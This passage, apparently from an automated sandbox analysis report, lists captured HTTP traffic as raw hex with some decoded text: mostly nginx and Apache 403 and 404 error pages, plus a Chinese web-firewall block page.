42 6b 28 01 cc 41 1f 40 df af de 38 67 11 e2 29 82 20 8d 97 f9 d2 05 5e 1a 2f f1 b2 5c 16 1c 3e 1e b8 e7 c6 be aa 0c 55 cd 23 57 c7 f3 bc 8d 35 18 43 f2 96 6f 98 55 86 72 c3 8b 07 f1 15 97 e4 af 42 62 f1 3e 64 69 4e be 70 9e 7d e2 6d c3 6d 10 ab 7
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 04 Jun 2024 12:37:55 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cacheContent-Encoding: gzipData Raw: 33 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 5b 6f 13 47 14 7e 8e 7f c5 74 a3 0a 1b c5 7b b3 13 c2 7a 6d 89 a2 54 42 0d a2 52 53 f1 80 aa 6a bc 17 ef 90 dd 9d d5 ee 38 97 5a 96 48 28 01 04 34 41 25 6a 2e 95 68 43 9b 96 46 32 85 54 82 92 98 fe 99 cc ae f3 94 bf d0 d9 8b 8d 43 5a fb 61 77 ce 9e f3 7d e7 9b f9 e6 a8 1f e9 58 23 8b 9e 01 2c e2 d8 b5 9c da 7f 18 50 67 2b c7 20 10 68 16 f4 03 83 54 b9 26 31 8b 93 1c 0b 13 44 6c a3 16 75 1f 47 7b 9b c7 1b af a2 a5 3d ba b3 a9 0a 69 38 a7 06 64 91 7d ce 9d 6f 39 d0 6f 20 57 11 2b 1e d4 75 e4 36 d8 9b 86 6d ec 2b a3 e5 72 b9 9d ab 63 7d b1 65 62 97 14 03 f4 8d a1 48 65 6f a1 92 2c 4d e8 20 7b 51 e1 68 e7 c1 51 f7 7b ae 9d e3 1d 88 dc d6 3c d2 89 a5 4c 88 22 cb cb a0 25 f1 63 00 9b 04 57 58 4e 42 df aa 43 6d b6 e1 e3 a6 ab 2b 60 54 16 e1 78 09 66 a4 60 d4 34 cd 94 20 e1 03 d2 04 03 b2 0c d4 b0 88 02 ca 31 aa 8d 5c a3 78 2a 92 75 5e b4 0d 93 25 c9 71 12 a3 d2 58 97 86 4b 86 c8 8a 99 30 b3 64 5e 30 2f 56 40 06 22 4f c6 15 75 ec eb 86 af 48 de 02 d0 61 60 19 3a 18 d5 26 f4 8b f5 89 c1 c6 c4 c0 b1 04 a9 95 e6 16 eb 98 10 ec b0 1e cf d6 a4 4c b1 9a b2 28 8a a9 a0 f9 4c 45 1d db 7a 05 64 9b 03 44 f6 4f 5a 06 7d 19 03 d8 c9 54 08 91 b3 43 ea 13 c6 71 90 1c 42 06 19 23 b6 73 d8 1e 1c 66 86 09 64 99 a5 be 3f d8 38 07 d8 a8 35 bc 85 a5 44 95 2a 64 86 50 05 2b b5 55 a0 f9 c8 23 ef 8d f5 e5 cc a7 cc 58 00 e9 55 6e fa d2 d7 97 af 4d 4f 4f 5d 9e e1 40 e0 6b 55 4e 10 02 7d 96 1f 97 78 1b 0a 37 83 22 5b 14 3d 1f f3 0e 72 f9 9b 01 57 63 e0 09 18 73 65 f6 32 7d 89 47 2e 22 f9 16 d2 15 ee b3 cf e7 be c0 0d 74 1d 2d 7c 32 35 65 5d bf c2 8d 69 b3 ff 11 6d 17 86 70 62 5b d6 72 23 aa 8e e6 80 66 c3 20 a8 72 b1 fd 98 f1 47 4e 05 13 bf 71 67 af 01 ab fb 30 35 f3 4b 02 31 a2 7a 7d 58 22 71 b5 70 f9 f7 68 eb db de 8b d7 e1 cb 65 fa 66 37 fc f1 fe d1 9b 47 74 ed 5e b8 bf 4e 57 97 c3 f5 3f 4f 0e 1f d2 d7 af 7a 3b 7b e9 7d 8b 3a 3f 47 6b 2b f4 f1 46 af f3 2e ea 76 c2 07 bb e1 bd 3f 4e 0e 97 54 c1 fb 10 5d e6 6a 74 f5 45 ef 76 97 7e f7 94 6e ff 74 72 b8 35 48 c2 ec ae b3 56 46 54 1b c5 1d 84 ab 6b 47 6f 7f 61 7d d0 95 3b b4 f3 37 7d 78 87 ae ed d1 47 2f 8f 37 9f b3 60 f8 e4 80 de 3d 48 5b 54 05 56 91 a8 10 32 8c 21 39 31 e1 ee f2 51 77 bd f7 db 33 ba b2 ff bf 84 cf 6e 85 4f 7f 4d 39 53 c2 93 c3 ed 01 70 d2 13 83 49 e5 86 f7 37 98 62 b6 07 8c be b7 f4 24 da 3f 88 9e bf 3d fe e1 af b8 fa dd 36 5d 5f 39 53 1a 6e 76 8e 6f 6d a5 d5 bd ce 3f b4 b3 73 aa 3a 19 5a 83 4d 1c ae ee 2b 52 85 f4 04 b3 a7 2a a4 86 e8 fb 2b 07 06 3f 36 15 67 90 63 e0 26 c9 9b 4d 57 23 08 bb f9 42 6b 28 01 cc 41 1f 40 df af de 38 67 11 e2 29 82 20 8d 97 f9 d2 05 5e 1a 2f f1 b2 5c 16 1c 3e 1e b8 e7 c6 be aa 0c 55 cd 23 57 c7 f3 bc 8d 35 18 43 f2 96 6f 98 55 86 72 c3 8b 07 f1 15 97 e4 af 42 62 f1 3e 64 69 4e be 70 9e 7d e2 6d c3 6d 10 ab 7
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 04 Jun 2024 12:37:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cacheContent-Encoding: gzipData Raw: 33 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 5b 6f 13 47 14 7e 8e 7f c5 74 a3 0a 1b c5 7b b3 13 c2 7a 6d 89 a2 54 42 0d a2 52 53 f1 80 aa 6a bc 17 ef 90 dd 9d d5 ee 38 97 5a 96 48 28 01 04 34 41 25 6a 2e 95 68 43 9b 96 46 32 85 54 82 92 98 fe 99 cc ae f3 94 bf d0 d9 8b 8d 43 5a fb 61 77 ce 9e f3 7d e7 9b f9 e6 a8 1f e9 58 23 8b 9e 01 2c e2 d8 b5 9c da 7f 18 50 67 2b c7 20 10 68 16 f4 03 83 54 b9 26 31 8b 93 1c 0b 13 44 6c a3 16 75 1f 47 7b 9b c7 1b af a2 a5 3d ba b3 a9 0a 69 38 a7 06 64 91 7d ce 9d 6f 39 d0 6f 20 57 11 2b 1e d4 75 e4 36 d8 9b 86 6d ec 2b a3 e5 72 b9 9d ab 63 7d b1 65 62 97 14 03 f4 8d a1 48 65 6f a1 92 2c 4d e8 20 7b 51 e1 68 e7 c1 51 f7 7b ae 9d e3 1d 88 dc d6 3c d2 89 a5 4c 88 22 cb cb a0 25 f1 63 00 9b 04 57 58 4e 42 df aa 43 6d b6 e1 e3 a6 ab 2b 60 54 16 e1 78 09 66 a4 60 d4 34 cd 94 20 e1 03 d2 04 03 b2 0c d4 b0 88 02 ca 31 aa 8d 5c a3 78 2a 92 75 5e b4 0d 93 25 c9 71 12 a3 d2 58 97 86 4b 86 c8 8a 99 30 b3 64 5e 30 2f 56 40 06 22 4f c6 15 75 ec eb 86 af 48 de 02 d0 61 60 19 3a 18 d5 26 f4 8b f5 89 c1 c6 c4 c0 b1 04 a9 95 e6 16 eb 98 10 ec b0 1e cf d6 a4 4c b1 9a b2 28 8a a9 a0 f9 4c 45 1d db 7a 05 64 9b 03 44 f6 4f 5a 06 7d 19 03 d8 c9 54 08 91 b3 43 ea 13 c6 71 90 1c 42 06 19 23 b6 73 d8 1e 1c 66 86 09 64 99 a5 be 3f d8 38 07 d8 a8 35 bc 85 a5 44 95 2a 64 86 50 05 2b b5 55 a0 f9 c8 23 ef 8d f5 e5 cc a7 cc 58 00 e9 55 6e fa d2 d7 97 af 4d 4f 4f 5d 9e e1 40 e0 6b 55 4e 10 02 7d 96 1f 97 78 1b 0a 37 83 22 5b 14 3d 1f f3 0e 72 f9 9b 01 57 63 e0 09 18 73 65 f6 32 7d 89 47 2e 22 f9 16 d2 15 ee b3 cf e7 be c0 0d 74 1d 2d 7c 32 35 65 5d bf c2 8d 69 b3 ff 11 6d 17 86 70 62 5b d6 72 23 aa 8e e6 80 66 c3 20 a8 72 b1 fd 98 f1 47 4e 05 13 bf 71 67 af 01 ab fb 30 35 f3 4b 02 31 a2 7a 7d 58 22 71 b5 70 f9 f7 68 eb db de 8b d7 e1 cb 65 fa 66 37 fc f1 fe d1 9b 47 74 ed 5e b8 bf 4e 57 97 c3 f5 3f 4f 0e 1f d2 d7 af 7a 3b 7b e9 7d 8b 3a 3f 47 6b 2b f4 f1 46 af f3 2e ea 76 c2 07 bb e1 bd 3f 4e 0e 97 54 c1 fb 10 5d e6 6a 74 f5 45 ef 76 97 7e f7 94 6e ff 74 72 b8 35 48 c2 ec ae b3 56 46 54 1b c5 1d 84 ab 6b 47 6f 7f 61 7d d0 95 3b b4 f3 37 7d 78 87 ae ed d1 47 2f 8f 37 9f b3 60 f8 e4 80 de 3d 48 5b 54 05 56 91 a8 10 32 8c 21 39 31 e1 ee f2 51 77 bd f7 db 33 ba b2 ff bf 84 cf 6e 85 4f 7f 4d 39 53 c2 93 c3 ed 01 70 d2 13 83 49 e5 86 f7 37 98 62 b6 07 8c be b7 f4 24 da 3f 88 9e bf 3d fe e1 af b8 fa dd 36 5d 5f 39 53 1a 6e 76 8e 6f 6d a5 d5 bd ce 3f b4 b3 73 aa 3a 19 5a 83 4d 1c ae ee 2b 52 85 f4 04 b3 a7 2a a4 86 e8 fb 2b 07 06 3f 36 15 67 90 63 e0 26 c9 9b 4d 57 23 08 bb f9 42 6b 28 01 cc 41 1f 40 df af de 38 67 11 e2 29 82 20 8d 97 f9 d2 05 5e 1a 2f f1 b2 5c 16 1c 3e 1e b8 e7 c6 be aa 0c 55 cd 23 57 c7 f3 bc 8d 35 18 43 f2 96 6f 98 55 86 72 c3 8b 07 f1 15 97 e4 af 42 62 f1 3e 64 69 4e be 70 9e 7d e2 6d c3 6d 10 ab 7
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 04 Jun 2024 12:38:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cacheData Raw: 35 66 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e e7 bd 91 e7 ab 99 e9 98 b2 e7 81 ab e5 a2 99 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 63 6f 6c 6f 72 3a 23 34 34 34 7d 0a 62 6f 64 79 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 e5 ae 8b e4 bd 93 22 7d 0a 2e 6d 61 69 6e 7b 77 69 64 74 68 3a 36 30 30 70 78 3b 6d 61 72 67 69 6e 3a 31 30 25 20 61 75 74 6f 3b 7d 0a 2e 74 69 74 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 30 61 35 33 61 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 68 65 69 67 68 74 3a 20 34 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 34 30 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 7d 0a 2e 63 6f 6e 74 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 33 66 37 66 39 3b 20 68 65 69 67 68 74 3a 32 38 30 70 78 3b 62 6f 72 64 65 72 3a 31 70 78 20 64 61 73 68 65 64 20 23 63 36 64 39 62 36 3b 70 61 64 64 69 6e 67 3a 32 30 70 78 7d 0a 2e 74 31 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 64 61 73 68 65 64 20 23 63 36 64 39 62 36 3b 63 6f 6c 6f 72 3a 20 23 66 66 34 30 30 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 38 70 78 3b 7d 0a 2e 74 32 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 38 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 0a 6f 6c 7b 6d 61 72 67 69 6e 3a 30 20 30 20 32 30 70 78 20 32 32 70 78 3b 70 61 64 64 69 6e 67 3a 30 3b 7d 0a 6f 6c 20 6c 69 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 31 2e 6c 61 2f 6a 73 2d 73 64 6b 2d 70 72 6f 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 4c 41 2e 69 6e 69 74 28 7b 69 64 3a 22 4b 50 76 53 6f 67 69 57 69 78 42 45 45 68 57 49 22 2c 63 6b 3a 22 4b 50 76 53 6f 67 69 57 69 78 42 45 45 68 57 49 22 7d 29 3c 2f 73 63 72 69 70 74 3e 0a 3c 62 6f 64 79 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e e7 bd 91 e7 ab 99 e9 98 b2 e7 81 ab e5 a2 99 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 74 31 22 3e e6 82 a8 e7 9a 84 e8 af b7 e6 b1 82 e5 b8 a6 e6 9c 89 e4 b8 8d e5 90 88 e6 b3 95 e5 8
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Jun 2024 12:39:09 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Jun 2024 12:39:11 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Jun 2024 12:39:14 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Jun 2024 12:39:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 04 Jun 2024 12:40:35 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cacheContent-Encoding: gzipData Raw: 33 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 5b 6f 13 47 14 7e 8e 7f c5 74 a3 0a 1b c5 7b b3 13 c2 7a 6d 89 a2 54 42 0d a2 52 53 f1 80 aa 6a bc 17 ef 90 dd 9d d5 ee 38 97 5a 96 48 28 01 04 34 41 25 6a 2e 95 68 43 9b 96 46 32 85 54 82 92 98 fe 99 cc ae f3 94 bf d0 d9 8b 8d 43 5a fb 61 77 ce 9e f3 7d e7 9b f9 e6 a8 1f e9 58 23 8b 9e 01 2c e2 d8 b5 9c da 7f 18 50 67 2b c7 20 10 68 16 f4 03 83 54 b9 26 31 8b 93 1c 0b 13 44 6c a3 16 75 1f 47 7b 9b c7 1b af a2 a5 3d ba b3 a9 0a 69 38 a7 06 64 91 7d ce 9d 6f 39 d0 6f 20 57 11 2b 1e d4 75 e4 36 d8 9b 86 6d ec 2b a3 e5 72 b9 9d ab 63 7d b1 65 62 97 14 03 f4 8d a1 48 65 6f a1 92 2c 4d e8 20 7b 51 e1 68 e7 c1 51 f7 7b ae 9d e3 1d 88 dc d6 3c d2 89 a5 4c 88 22 cb cb a0 25 f1 63 00 9b 04 57 58 4e 42 df aa 43 6d b6 e1 e3 a6 ab 2b 60 54 16 e1 78 09 66 a4 60 d4 34 cd 94 20 e1 03 d2 04 03 b2 0c d4 b0 88 02 ca 31 aa 8d 5c a3 78 2a 92 75 5e b4 0d 93 25 c9 71 12 a3 d2 58 97 86 4b 86 c8 8a 99 30 b3 64 5e 30 2f 56 40 06 22 4f c6 15 75 ec eb 86 af 48 de 02 d0 61 60 19 3a 18 d5 26 f4 8b f5 89 c1 c6 c4 c0 b1 04 a9 95 e6 16 eb 98 10 ec b0 1e cf d6 a4 4c b1 9a b2 28 8a a9 a0 f9 4c 45 1d db 7a 05 64 9b 03 44 f6 4f 5a 06 7d 19 03 d8 c9 54 08 91 b3 43 ea 13 c6 71 90 1c 42 06 19 23 b6 73 d8 1e 1c 66 86 09 64 99 a5 be 3f d8 38 07 d8 a8 35 bc 85 a5 44 95 2a 64 86 50 05 2b b5 55 a0 f9 c8 23 ef 8d f5 e5 cc a7 cc 58 00 e9 55 6e fa d2 d7 97 af 4d 4f 4f 5d 9e e1 40 e0 6b 55 4e 10 02 7d 96 1f 97 78 1b 0a 37 83 22 5b 14 3d 